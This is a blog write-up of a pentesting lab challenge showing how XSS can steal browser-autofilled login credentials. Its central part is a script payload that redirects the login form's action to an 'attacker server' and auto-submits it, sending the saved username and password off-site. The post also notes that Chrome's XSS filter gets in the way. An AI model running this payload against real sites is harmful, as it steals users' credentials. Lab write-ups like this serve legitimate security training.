XSS - Stealing from Auto complete: JS for Pentesters task 12 write up

Oct 30, 2014 • jsp, javascript, xss, security-tube

writeup for task-12 of the JS for pentesters series by securitytube - Stealing Autocomplete

Stealing from AutoComplete ? Well, that was the same reaction which comes to my mind when I went through this challenge. Usually people have a habit of saving their Username:Password combinations to the browser so that they don’t want to type and repeat the same thing again when they login next time. But if the web application that the user tries to login is vulnerable to XSS, then this action will be dangerous !

JS for Pentesters task 12

Once you get into the challenge page, try entering a random username:password combination and click sign in. When the browser ask if you wanna save the password or not, click on remember password. So what happens is that next time if we visit the page, the username:password fields will be automatically filled by the browser for us. Let us see how can we steal this information:

So here what we basically want to do is to submit this form automatically without user intervention to an attacker server. We also needs to modify the form submit action so that it can point to our server instead of the original server. So the payload looks like this:

    <script>
    window.setTimeout(function () {
    document.forms[0].action = "http://pentesteracademylab.appspot.com/lab/webapp/1";
    document.forms[0].submit();
    }, 10000);
    </script>

Here what we are doing is that we are using the setTimeout() function in JavaScript which helps us in executing a function after a specified interval of time. So inside that function, we will use a user defined function in which we modify the document submit action to our own server and then we will call .submit() function which will automatically submit the form.

We cannot use an eventHandler (which seems can also be used) because while using .submit(), we are submitting form automatically and not by user clicking on the same. so eventHandler won’t be provoked while doing it.

Note:

1) While playing with XSS challenges, it is always recommended to use Mozilla Firefox because Google chrome has inbuilt XSS stopper which will stop us from executing arbitrary JavaScript code even if the page is vulnerable to XSS. So its strongly recommended to use Firefox instead of chrome.

2) The solutions written above is the way we cracked the problem which might be different from the solution videos provided by the SecurityTube. If you need the solution video, you have to subscribe to PentesterAcademy.

We hope that you really liked this challenge. If there is anything you didn’t understand or wanted to get more clarity, please comment down and we are more than happy to help. Also, if you get a better way of solving the challenge, please share it with us and we are happy to learn from our readers too. Happy pentesting..

Anirudh Anand

Head of Product Security & DevSecOps at @CRED_club | Application Security ♥ | CTF lover - @teambi0s | Security Trainer - @7asecurity | certs - eWDP, OSCP, OSWE